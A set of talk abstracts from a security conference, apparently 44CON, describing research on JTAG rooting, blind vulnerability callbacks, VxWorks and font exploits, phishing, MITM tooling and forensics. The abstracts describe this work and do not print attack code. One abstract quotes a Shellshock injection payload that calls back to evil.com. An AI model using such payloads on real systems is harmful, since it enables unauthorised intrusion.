Jtagsploitation: 5 wires, 5 ways to root

Presented By: Joe FitzPatrick & Matt King

JTAG comes up in nearly every hardware-related hack. In order to do anything via JTAG, you generally need a hardware debugging device that connects to anything from a standard header to undocumented test points scattered around a device. JTAG access is almost always ‘game over’ but it’s not always clear how to turn that hardware access into privileged software access on the system.

This talk will enumerate a number of different ways to turn a ‘check’ for jtag access into the ‘checkmate’ of root shell access. Each example will demonstrate a unique method for getting root access via JTAG. Each method is also general enough to be broadly applicable across different hardware architectures and implementations. Example code and scripts will be released at the talk.

Hunting Asynchronous Vulnerabilities

Presented By: James Kettle

In blackbox tests vulnerabilities can lurk out of sight in backend functions and background threads. Issues with no visible symptoms like blind second order SQL injection and shell command injection via nightly cronjobs or asynchronous logging functions can easily survive repeated pentests and arrive in production unfixed.

The only way to reliably hunt these down is using exploit-induced callbacks. That is, for each potential vulnerability X send an exploit that will ping your server if it fires, then patiently listen.

In this presentation, I’ll show that exploit-induced callbacks can be taken far beyond () { :;}; echo 1 > /dev/udp/evil.com/53 to find blind and asynchronous XXE, (DOM)XSS, SQli, SMTP and even pure XML injection. I’ll examine a range of techniques to coax applications into issuing a callback by any means possible. These will start out clean and simple and quickly degenerate into crude cross-technology/platform multi-context exploit chains, some of which are definitely not advisable for production servers.

This presentation will also cover coping strategies for some of the innate hazards associated with hosting the infrastructure required to automate finding these vulnerabilities.

Old Dog, New Tricks: Forensics With PowerShell

Presented By: Jared Atkinson

Recent intrusion into the networks of organizations like Office of Personnel Management, Sony, JPMorgan Chase, and British Airways have shown that the question isn’t “if” your organization will be targeted, but “when”. With these attacks and many others in recent years, incident response teams have had to rapidly change tactics from the “image-and-forget” methodology to live box forensics and containment. During these engagements, forensic analysts must actively track and monitor an adversary in their network while preventing the adversary from recognizing detection but most tools are not up to the job. PowerShell brings the flexibility and in-memory nature to defenders to tackle live threats.

In this workshop, I will cover how my project, PowerForensics, can provide the Digital Forensics/Incident Response community with an all in one toolset for attack response and investigation. By leveraging PowerShell’s access to the Windows API and .NET framework, PowerForensics provides investigators with a forensically sound “live” investigation platform without the need to image the hard drive. I’ll cover the background and overview of PowerForensics, including how its various capabilities can facilitate the investigation of advanced actors at scale. Finally, I’ll cap off with a complex demo, showing how PowerForensics can help blue teams investigate the real attacks they’re now facing. PowerShell isn’t just for the red team anymore.

Inside Terracotta VPN

Presented By: Kent Backman

Virtual Private Networks (VPN) are very popular. They are part and parcel for almost every enterprise network, especially those with remote employees. Aside from VPNs for enterprises, there are many reputable commercial VPN services that offer low cost, reliable service to individual users. These users employ VPNs for reasons that might include connection security, protection of privacy data, online gaming acceleration, and bypassing service provider restrictions. VPN’s are also popular with cyber criminals, as it is one way the latter can obscure their true source location. When a commercial VPN service provider uses resources such as servers and copious bandwidth stolen or repurposed from unsuspecting victims for purposes of profit, the offering clearly crosses into the criminal domain. In this report, FirstWatch exposes one such operator doing business with multiple VPN brand names out of the People’s Republic of China (PRC). At last count, the Terracotta VPN node ecosystem consisted of more than 1500 systems around the globe. Every Windows server running as a Terracotta VPN node that FirstWatch was able to verify was hacked.

The operators behind Terracotta VPN continue their broad campaign to compromise multiple victim organizations around the world. Meanwhile, advanced threat actors such as Shell_Crew (Google RSA Shell_Crew for details) use Terracotta VPN to anonymize their activity while they hack the crap out of governments and commercial entities around the world. While RSA has yet to release the paper to the public, an earlier version of Inside Terracotta VPN was presented to Microsoft’s invitation-only Digital Crimes Consortium (DCC 2105) conference in Miami. This presenter will share with the 44CON London audience otherwise non-public information previously restricted to law enforcement on how this was discovered, and other stuff not appearing in the paper to be released by RSA (this summer).

Hackers in the Wire and Drones Oh My!

Presented By: Philip Polstra

At the second 44CON Phil debuted The Deck, a penetration testing Linux distro for the BeagleBoard, BeagleBone, BeagleBone Black, and similar small computing devices. In this talk you will learn how to perform very powerful, yet inexpensive, penetration tests with an army of low-power ARM-based devices connected via a wireless, out-of-band, network. These devices range from wired/wireless dropboxes, to wired/wireless remote hacking drones, to flying remote hacking drones, to taps installed inline in the target’s data center. All of the action can be controlled from up to a mile away (Phil recommends poolside at a nearby hotel) or from anywhere in the world using gateways.

Devices to be discussed include the BeagleBone Black, BeagleBoard xM, BeagleBoard X15, the Little Universal Network Appliance (LUNA), the Raspberry Pi 2, and aerial delivery platforms.

Attacking VxWorks: from Stone Age to Interstellar

Presented By: Yannick Formaggio

VxWorks is the world’s most widely-used real-time operating system deployed in embedded systems. Its market reach spans across all safety critical fields, including the Mars Curiosity rover, Boeing 787 Dreamliner, network routers to name a few. The safety critical nature of these applications make VxWorks security a major concern.

Our team has conducted a thorough security analysis on VxWorks, including its supported network protocols and OS security mechanism. We will present the tool we developed for VxWorks assessment. The main goal of our tool is to provide effective penetration testing by implementing the WdbRPC protocol in python. To show its effectiveness, we are going to reveal some of the bugs we discovered along the way.

Finally, we will wrap up by demonstrating the vulnerability we found that allows remote code execution on most VxWorks based devices. A quick Internet scan shows that at least 100k devices running VxWorks are connected to the Internet. Considering the popularity of VxWorks in the age of IoT, this issue will have a widespread impact.

reverse reverse engineering

Presented By: Richo Healey

Richo will walk attendees through the basic architecture of a traditional AOT compiler and runtime loader, and describe the parallels between this and the operation of a modern bytecode VM (python, ruby, etc). With this newfound knowledge, we’ll tackle implementing a tool to reverse engineer a sample of obfuscated ruby. However, instead of analyzing the bytecode directly, we will instead implement a malicious, but otherwise fully functional VM, and use that to explore the various anti-analysis tricks deployed.

By the end of the talk, you will have extended insight into the conceptual inner workings of a compiler, and feel equipped to implement substitutes for the interesting parts of a traditional compilation/loader pipeline to trick opaque objects into telling you how they work, instead of the other way around. While the demos will focus on ruby, the techniques demonstrated are equally applicable to python, etc.

MITMf: Bringing Man-In-The-Middle attacks to the 21’st century

Presented By: Marcello Salvati

Tired of managing countless scripts for automating your Man-In-The-Middle attacks?

Have a cool idea for a MITM attack, but don’t want to spend hours writing a script from scratch?

Tired of bashing your head against the wall trying to figure out why Ettercap’s filters are not working?

Well look no further!

MITMf combines new and old MITM techniques into a framework! Written in Python, It’s built to be extremely extendible and reliable , while updating the current MITM attacks for the 21st century!

Dark Fairytales from a Phisherman (Vol.II)

Presented By: Michele Orru

Phishing attacks are a prevalent threat against large or small organisations. As professionals in the security field we need to be able to give our clients the look and feel of what a real “bad guy” may do to attack an organisation.

Leverage Phishing Frenzy and BeEF on your next engagement to ensure your client is getting the most out of their assessment. With simple templates you can launch an effective phishing campaign in minutes, and thanks to the BeEF integration you’ll be hooking and exploiting browsers in no time.

Have you ever wondered what is the best pretext to use during your phishing campaign use-case? What about timeframes? We’ll discuss statistics based on real-world professional phishing engagements. We’ll also entertain you with fun (and real) hacking stories involving phishing and client-side exploitation.

Reverse engineering and exploiting font rasterizers: the OpenType saga

Presented By: Mateusz Jurczyk

Font rasterization software is clearly among the most desirable attack vectors of all time, due to multiple reasons: the wide variety of font file formats, their significant structural and logical complexity, typical programming language of choice (C/C++), average age of the code, ease of exploit delivery and internal scripting capabilities provided by the most commonly used formats (TrueType and OpenType). As every modern widespread browser, document viewer and operating system is exposed to processing external, potentially untrusted fonts, this area of security has a long history of research. As a result, nearly every major vendor releases font-related security advisories several times a year, yet we can still hear news about more 0-days floating in the wild.

Over the course of the last few months, we performed a detailed security audit of the implementation of OpenType font handling present in popular libraries, client-side applications and operating systems, which appears to have received much less attention in comparison to e.g. TrueType. During that time, we discovered a number of critical vulnerabilities, which could be used to achieve 100% reliable arbitrary code execution, bypassing all currently deployed exploit mitigations such as ASLR, DEP or SSP. More interestingly, a number of those vulnerabilities were found to be common across various products, enabling an attacker to create chains of exploits consisting of a very limited number of distinct security bugs.

The presentation will outline the current state of the art with regards to font security research, in the context of how the overall field of typography has evolved over the years, both back in the 80’s and 90’s and the more recent times, including the connections and ties between various font engines seen today. Following the enumeration of potential attack surfaces, we will discuss the process of reverse-engineering widespread proprietary OpenType/CFF implementations such as the Windows kernel ATMFD.DLL module (Adobe Type Manager Font Driver), and provide an in-depth analysis of the root cause and reliable exploitation process of vulnerabilities discovered in products such as Microsoft Windows, Adobe Reader, DirectWrite (Internet Explorer), FreeType and others.

15-Minute Linux Incident Response Live Analysis

Presented By: Philip Polstra

This presentation will show attendees how to perform an initial live analysis of a Linux system in mere minutes. The focus of the talk will be a set of shell scripts that allow an investigator to quickly make a determination as to whether or not an incident has occurred without the need to shutdown the system to perform traditional dead analysis.

Within 15 minutes the investigator should have a rough idea of what has transpired and will be in a better position to determine if dead analysis is warranted. The shell scripts presented minimize the disturbance to the system and send all information to a forensics workstation over the network.

Nothing beyond basic Linux knowledge (user not administrator) is required of attendees. Attendees will leave with some tools for live analysis and also a good introduction to shell scripting for those that are new to this topic.

A Trek to the Emerald City: Ring -1 Based AV

Presented By: Shift

To compete in the endless race against rootkits, antivirus software vendors are slowly starting to use the Virtualization Extensions offered by commodity CPUs.

The attack surface of AV software has been has been large enough until now, but hypervisor-based AV solutions expose a whole new attack surface. By exploiting flaws in AV software, instead of Ring 0 control or full Administrator privileges, it is now possible to gain Ring -1 permissions, an almost jackpot-like Ring which allows controlling the Virtualization Extensions our CPUs employ.

This talk takes us into the realm of Hypervisor based AVs, to see how well they’ve managed to walk in the depths or Ring -1 in their attempts to implement a thin hypervisor layer to help in the fight against rootkits. track: Offence

Get in the Ring0 – Understanding Windows drivers

Presented By: Graham Sutherland

Separate your IRPs from your IRQLs, people, it’s time to learn about Windows drivers. Turns out they’re not magic. Who knew?

Going AUTH the Rails on a Crazy Train

Presented By: Tomek Rabczak & Jeff Jarmoc

Rails has a strong foundation in convention over configuration. In this regard, Rails handles a lot of security related conventions for developers, keeping them safe from vulnerabilities such as SQL Injection, XSS, and CSRF out of the box. However, authentication and authorization logic is largely left up to the developer. It is here that the abilities of the framework hit the end of the track and it’s up to the developers to keep themselves safe. In this talk, we take a look at patterns that we’ve seen across some of the largest Rails applications on the internet and cover common pitfalls that you as a security researcher and/or developer can watch out for. We will also be discussing and releasing a new dynamic analysis tool for Rails applications to help pentesters navigate through authentication and authorization solutions in Rails.

Responsible disclosure: who cares?

Presented By: OJ Reeves & Dan Tentler

Both OJ and Dan have been conducting security assessments for years. Occasionally a discovery is made which warrants discreetly contacting the vendor in question to let them know several thousand (or million) of their devices have a major vulnerability. Sometimes the vendor takes notice and subsequently takes action, however sadly on most occasions they either feign effort, completely ignore the researcher, or openly say ‘go away’. These are a couple stories of how responsible disclosure was attempted, but the company in question couldn’t be troubled to help themselves.

Dan will articulate the story of events surrounding the recent goatse-ing of a sign in Atlanta, Georgia. LED billboards are apparently just like every other “IoT” style device – completely open, completely public, you just have to know where to look. A little shodanning and one can find any number of colorful things on the internet. Dan will tell the story about his attempts to notify this sign company shortly before they got goatse’d, their interactions before and after and the demeanor in which one can conduct oneseself when going about turning a security disclosure into a conference talk. We will check live on stage to see how many of these things still exist, as well.

OJ will tell a horrible tale of his first ever disclosure experience, one that involved a very large vendor of consumer storage products. The story consists of initial vulnerability discovery, analysis, and exploitation, and then leads into what seemed like an endless back-and-forth with the vendor over a series of months. There were lows, and there were highs. The former outnumbered the latter. There was much derp! All will be shared in its lulzy glory, in gory detail, up to and including a discussion with the vendor’s CSO. The story will end with an opinion. A strong one. OJ will also be trawling shodan to show how many boxes are still vuln. He will be going through the exploit step by step and explaining how things were discovered.

Software Defined Networking (SDN) Security

Presented By: David Jorm

SDN is rapidly moving from R&D to production deployment, with some frightening security implications. This presentation will provide an overview of emerging SDN technologies, the attack surfaces they expose, and the kinds of vulnerabilities that have already been discovered in popular SDN controllers. A live demo of several exploits will show the potential security implications of deploying SDN in production today. Finally we will look at some efforts currently underway to improve the security of SDN controllers.

Forging the USB armory

Presented By: Andrea Barisani

The availability of modern System on a Chip (SoC) parts, having low power consumption and high integration of most computer components in a single chip, empowers the open source community in creating all kind of embedded systems.

The presentation illustrates the journey that we have taken to develop an open hardware board first of its kind: the USB armory, an open source hardware design, implementing a flash drive sized computer for security applications.

The security features of the USB armory System on a Chip (SoC), combined with the openness of the board design, is meant to empower developers and users with a fully customizable USB trusted device for open and innovative personal security applications.

The presentation explores the lessons learned in making a small form factor, high specifications, embedded device with solely open source tools, its architecture and security features such as secure boot and ARM TrustZone implementation.

The security applications of the implemented concept are explored, illustrating the advantage of an open USB device with increased computational power.

The first open source application for the platform, developed by Inverse Path, for advanced file encryption functionality, will also be covered.

Stegosploit – Drive-by Browser Exploits using only Images

Presented By: Saumil Shah

“A good exploit is one that is delivered with style”.

Stegosploit creates a new way to encode “drive-by” browser exploits and deliver them through image files. These payloads are undetectable using current means. This paper discusses two broad underlying techniques used for image based exploit delivery – Steganography and Polyglots. Drive-by browser exploits are steganographically encoded into JPG and PNG images. The resultant image file is fused with HTML and Javascript decoder code, turning it into an HTML+Image polyglot. The polyglot looks and feels like an image, but is decoded and triggered in a victim’s browser when loaded.